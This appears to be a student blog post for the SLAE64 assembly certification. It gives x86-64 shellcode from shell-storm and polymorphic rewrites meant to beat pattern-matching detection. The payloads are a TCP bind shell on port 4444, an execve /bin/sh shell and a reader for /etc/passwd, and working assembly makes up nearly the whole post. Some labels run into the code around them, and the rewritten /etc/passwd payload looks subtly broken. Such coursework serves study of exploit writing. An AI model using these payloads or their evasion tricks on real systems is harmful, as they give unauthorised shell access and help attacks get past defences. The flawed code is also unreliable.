This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification:
https://www.pentesteracademy.com/course?id=7
Student-ID: PA-15847
The Objectives for the Assignment:
- Take up 3 shellcode from shell-storm and create polymorphic versions of them to beat pattern matching
- the polymorphic versions cannot be larger 150% of the existing shellcode
- bonus points for making it shorter in length than original
The first shellcode is TCP Bind Shell:
http://shell-storm.org/shellcode/files/shellcode-858.php
1.1 Here’s the original code for the first syscall:
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
xor r8,r8
push 0x2
pop rdi
push 0x1
pop rsi
push 0x6
pop rdx
push 0x29
pop rax
syscall
1.2 Here’s the replacement for the syscall socket()
xor rax,rax
add al, 0x29 ;41:syscall number
xor rdi,rdi
add rdi,0x2 ;2:AF_INET
xor rsi,rsi
inc rsi ;1:SOCK_STREAM
xor rdx,rdx ;0:INADDR_ANY
syscall
mov rdi,rax2.1 The next part is actually nothing but syscall bind()
mov r8,rax
xor r10,r10
push r10
push r10
mov BYTE PTR [rsp],0x2
mov WORD PTR [rsp+0x2],0x697a
mov rsi,rsp
push r8
pop rdi
push 0x10
pop rdx
push 0x31
pop rax
syscall
2.2. Let’s replace it as we wrote in the first assignment
xor rax, rax
push rax
push rax ;0.0.0.0
push word 0x5C11 ;port 4444
push word 0x02 ;2:AF_INET
mov rsi,rsp
add rdx,0x10 ;16:length
add al, 0x31 ;49:syscall bind
syscall3.1 The next part seems syscall listen from the 0x32
push r8
pop rdi
push 0x1
pop rsi
push 0x32
pop rax
syscall
3.2 We can replace it with our original code
xor rax,rax
add al, 0x32 ;50:syscall listen
xor rsi,rsi
inc rsi ;1:backlog
syscall4.1 The next section seems syscall accept with 0x2b
mov rsi,rsp
xor rcx,rcx
mov cl,0x10
push rcx
mov rdx,rsp
push r8
pop rdi
push 0x2b
pop rax
syscall
4.2 We’ll replace it with our original code
xor rax,rax
add al, 0x2b ;43:syscall accept
xor rsi,rsi ;0:rsi
mov rdx,rsi ;0:rdx
syscall
mov r15,rax 5.1 This one can be replaced with our dup2() syscall
pop rcx
xor r9,r9
mov r9,rax
mov rdi,r9
xor rsi,rsi
push 0x3
pop rsi
dec rsi
push 0x21
pop rax
syscall
5.2 Here’s the replacement
xor rsi,rsi
add rsi, 0x02 ;counter with fd
mov rdi, r15 ;socket handle that we saved before
loop:
xor rax,rax
add al,0x21 ;33:syscall dup2
syscall
dec rsi
jns loop6.1 Here’s the last part of the original shellcode
jne 4000ef
xor rdi,rdi
push rdi
push rdi
pop rsi
pop rdx
movabs rdi,0x68732f6e69622f2f
shr rdi,0x8
push rdi
push rsp
pop rdi
push 0x3b
pop rax
syscall
6.2 We’ll replace this one with Syscall execve()
xor rax, rax
add rax, 59
xor r9, r9
push r9
mov rbx, 0x68732f6e69622f2f ;/bin//sh in reverse
push rbx
mov rdi, rsp
push r9
mov rdx, rsp
push rdi
mov rsi, rsp
syscallThe second shellcode is Execve /bin/sh:
http://shell-storm.org/shellcode/files/shellcode-603.php
xor rdx, rdx
mov qword rbx, '//bin/sh'
shr rbx, 0x8
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 0x3b
syscallWe can easily modify the first 3 lines as below:
;; xor rdx, rdx
sub rdx, rdx
push rdx
;; mov qword rbx, '//bin/sh'
mov rbx, 0x68732f2f6e696201
;; shr rbx, 0x8
add rbx, 0x2eThe 3rd shellcode is cat /etc/passwd:
http://shell-storm.org/shellcode/files/shellcode-878.php
I’ve included the original code from shell-storm below and replaced some of the lines by commenting the original lines
_start:
jmp _push_filename
_readfile:
pop rdi
; xor byte [rdi + 11], 0x41
; xor rax, rax
xor rsi, rsi
push rsi
push 0x2
; add al, 2
pop rax
; xor rsi, rsi
syscall
sub sp, 0xfff
lea rsi, [rsp]
mov rdi, rax
xor rdx, rdx
;xor rax, rax
mov rax, rdx
mov dx, 0xfff
syscall
xor rdi, rdi
;add dil, 1
inc rdi
mov rdx, rax
;xor rax, rax
;add al, 1
mov rdi, rax
syscall
xor rax, rax
add al, 60
syscall
_push_filename:
call _readfile
path: db "/etc/passwd"All of them are smaller in size and working as intended. 🙂
You can find the full code in my Github repository: